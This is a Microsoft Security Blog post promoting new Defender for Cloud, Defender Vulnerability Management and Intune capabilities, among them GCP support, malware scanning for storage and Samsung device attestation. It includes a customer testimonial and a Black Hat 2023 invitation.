On August 15, 2023, Defender CSPM will extend its advanced agentless scanning, data-aware security posture, cloud security graph, and attack path analysis capabilities to GCP, providing a single contextual view of cloud risks across Amazon Web Services (AWS), Azure, GCP, and hybrid environments. Defender CSPM provides advanced posture management capabilities and is recognized by KuppingerCole as an Overall Leader, Market Champion, Product Leader, and Innovation Leader in its 2023 CSPM Leadership Compass, noting “Organizations looking for a CSPM which provides multicloud capabilities including data-aware security posture should consider Microsoft Defender for Cloud.”⁵ Defender CSPM provides advanced posture management capabilities with full visibility across cloud and hybrid resources from agentless scanning, integrated contextual insights from code, identities, data, internet exposure, compliance, attack path analysis, and more, to prioritize your most critical risks. Customers will be able to leverage agentless scanning to gain full visibility of their GCP, AWS, Azure, and on-premises compute resources in the cloud security graph and attack path analysis to prioritize and mitigate risk against potential threats.  

Within the new Defender CSPM capabilities for GCP, we’re also extending our sensitive data discovery capabilities to GCP Cloud Storage. With this advancement, customers will be able to discover all their GCP Cloud Storage buckets, identify more than 100 sensitive information types, and assess their data security posture through cloud security graph queries and attack path analysis. Now customers can identify potentially sensitive data exposure risks across Azure, AWS, and GCP storage resources and harden their multicloud data security posture.

We chose Microsoft Defender for Cloud as our CNAPP because of the robust, intelligent end-to-end cloud security it provides with proactive CSPM and in protecting our cloud workloads. We’ve already been impressed with the value of Microsoft’s cloud workload protection, so it was an easy choice to also use Defender CSPM. Its agentless scanning allows us to quickly gain insights about our VMs, storage accounts, and containers, and attack path analysis with its contextual insights helps us prioritize and remediate risks. Defender for Cloud is critical in further helping our security teams save time to focus on preventing security incidents and give us peace of mind by knowing we have security across the application lifecycle.

—Cloud Security Manager, Mercedes-Benz Group AG

Get multicloud policy monitoring as a free offering

Microsoft’s cloud security benchmark (MCSB) extends security control guidance and compliance checks to GCP, completing multicloud monitoring across Azure, AWS, and GCP as a free offering. MCSB provides a cloud-centric control framework mapped to major regulatory industry benchmarks (CIS, PCI, NIST, and more) and cloud-specific implementation tools turned on by default to maintain your cloud security compliance across clouds.⁶ Today, along with existing Azure and AWS guidance, organizations can now leverage the MCSB security guidance for GCP environments and access GCP checks (as a preview feature) in the context of MCSB controls in the regulatory compliance dashboard in Microsoft Defender for Cloud. In addition to the policy compliance checking available through MCSB, Microsoft customers also benefit from the free expanded cloud logging support we announced last month.

Prevent malware upload and distribution in near real time

Defender for Cloud is also advancing cloud data security at runtime. We’re excited to share the upcoming general availability of Malware Scanning in Microsoft Defender for Storage.⁷ Starting September 1, 2023, security teams can enable an additional layer of protection to detect and prevent storage accounts from acting as a point of malware entry and distribution.

Organizations rely on cloud storage to store and access data and files, which often contain sensitive and critical data. However, due to its critical and connected role in an organization’s cloud environment, cloud storage can be an effective attack vector for malicious actors to upload and distribute malware. Malware protection methods in the past have focused mostly on compute resources. Protection for storage in this old model would require complex networking workarounds that negatively impact overall performance.

We built Malware Scanning in Defender for Storage to cut through the networking complexities and optimize malware detection for Microsoft Azure Blob Storage in near real time when content is uploaded. Content is automatically scanned for metamorphic and polymorphic malware, with results automatically recorded on the blob metadata.

Read more about Defender for Cloud’s new multicloud security capabilities.

Manage vulnerability risk across cloud deployments

As organizations adopt new technologies across cloud computing, Internet of Things (IoT) devices, and remote work, their attack surface is expanding, making vulnerability management increasingly challenging. Security teams must rethink how to secure a growing and diverse portfolio of devices outside of traditional organizational boundaries, adding complexity to the vulnerability management process. This process requires a combination of policy and scope definition that cannot be purchased off the shelf. Instead, it must be established and matured within an organization, based on its specific risk appetite and maturity level.

In recent years, Microsoft has established itself as a leading solution for vulnerability risk management (VRM) by leveraging its threat intelligence and security expertise. Microsoft Defender Vulnerability Management has become a leading solution for a vast range of customer organizations, providing them end-to-end capabilities across the VRM lifecycle. It is designed to help organizations identify, assess, prioritize, and remediate vulnerabilities in their IT environments, making it an ideal tool for managing an expanded attack surface and reducing overall risk posture, We are thrilled to announce Defender Vulnerability Management is now offered as a standalone solution, which means that customers can purchase it separately and take advantage of the full set of core and premium capabilities across their portfolio of managed and unmanaged devices. Microsoft 365 E5 and Defender for Endpoint Plan 2 customers have the core capabilities included and can continue to get the full vulnerability management solution with the Defender Vulnerability Add-on.  

Figure 2. Core and premium capabilities of Microsoft Defender Vulnerability Management and how customers would acquire them.

Committed to protecting the entire organization’s estate, we are excited to announce the general availability of vulnerability assessments for containers in Defender CSPM and the preview of vulnerability assessments for containers in Microsoft Defender for Containers using Defender Vulnerability Management. With the rise of containerization and microservices, it’s more important than ever to secure the software supply chain and ensure that container images are free from vulnerabilities. Defender Vulnerability Management’s new container vulnerability assessment capabilities enable organizations to scan container images for vulnerabilities and prioritize remediation efforts, based on the severity of the vulnerabilities.

Read more about the new standalone offer and the expanded capabilities of Defender Vulnerability Management.

Get additional protection and expanded endpoint coverage

You can’t protect and manage what you can’t see. This means that a Zero Trust model can’t just be limited to the endpoints enrolled in Microsoft Intune—it must extend to devices integrated with Microsoft Security solutions. If you can’t distribute compliance or security policies to all your devices, you can’t implement a Zero Trust model. 

Now you can expand coverage and provide additional protection from a single unified pane of glass with Microsoft Intune, which can manage the security settings of any device with Microsoft Defender for Endpoint, including Windows, macOS, and Linux endpoints.⁸ These policies and settings allow security admins to remain in the Defender portal to manage Defender for Endpoint and the Intune endpoint security policies for Defender security settings configurations. Now security admins can deploy policies from Intune to manage the Defender security settings on devices onboarded to Defender for Endpoint, without enrolling those devices with Intune.

Secure Score integration with Microsoft Intune means that recommendations for device health and security settings for your organization’s endpoints from Intune are now included in Microsoft Secure Score. Secure Score is the measurement of an organization’s security posture. This score is used to assess risk, drive configuration actions, plan improvements, and report to management. More points in Secure Score equates to more actions taken to improve an organization’s security posture.

And finally, we recently announced a new solution that adds another layer of protection for Samsung Galaxy devices with hardware-backed device attestation.⁹ Device attestation is a crucial mechanism to verify device trust and health to help detect if a device has been compromised. Building on our strategic partnership with Samsung, this attestation helps to prevent malicious endpoints from accessing organization resources using valid client information taken from another device and limiting tampering with client requests. Samsung’s hardware-backed cryptography and Intune app protection policies verify the client endpoint and secure the communication between Intune client and service. It enables a trusted, on-device hardware-backed health check, giving organizations that allow Samsung Galaxy mobile devices to access their corporate network the confidence that personally owned Galaxy devices have the same strong level of extra protection as company-owned devices.

Continuing to deliver for our customers

With our latest product and feature announcements, customers working to secure their multicloud and multiplatform deployments can have a clearer view of their environment, reduce risk, and gain improvements in the safety of their data and systems. At Microsoft, we are committed to providing our customers with the tools and resources they need to protect everything.

Join us at Black Hat 2023

Microsoft Security has a central presence at this year’s Black Hat USA, taking place August 5 to 10, 2023, at Mandalay Bay in Las Vegas, Nevada. If you haven’t already made plans to attend, check out our previous blog post for information about our Black Hat sessions, product demos, meetings at our booth (number 1740), and a customer happy hour.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and Twitter (@MSFTSecurity) for the latest news and updates on cybersecurity.

¹2023 State of the Cloud Report, Flexera. 2023. 

²Cloud-based cyber attacks increased by 48 percent in 2022, Continuity Central. January 19, 2023.

³Gartner®, Market Guide for Cloud-Native Application Protection Platforms, Neil MacDonald, et al. March 14, 2023.

⁴The next wave of multicloud security with Microsoft Defender for Cloud, a Cloud-Native Application Protection Platform (CNAPP), Vlad Korsunsky. March 22, 2023.

⁵Leadership Compass: Cloud Security Posture Management, KuppingerCole. July 27, 2023.

⁶Announcing Microsoft cloud security benchmark (Public Preview), Jim Cheng. October 13, 2022.

⁷Malware Scanning for cloud storage GA pre-announcement | prevent malicious content distribution, Inbal Argov. July 26, 2023.

⁸Manage security settings for Windows, macOS, and Linux natively in Defender for Endpoint, Dan Levy. July 11, 2023.

⁹Hardware-backed device attestation powers mobile workers, Michael Wallent. July 27, 2023.

The post New Microsoft Security innovations expand multicloud visibility and enhance multiplatform protection appeared first on Microsoft Security Blog.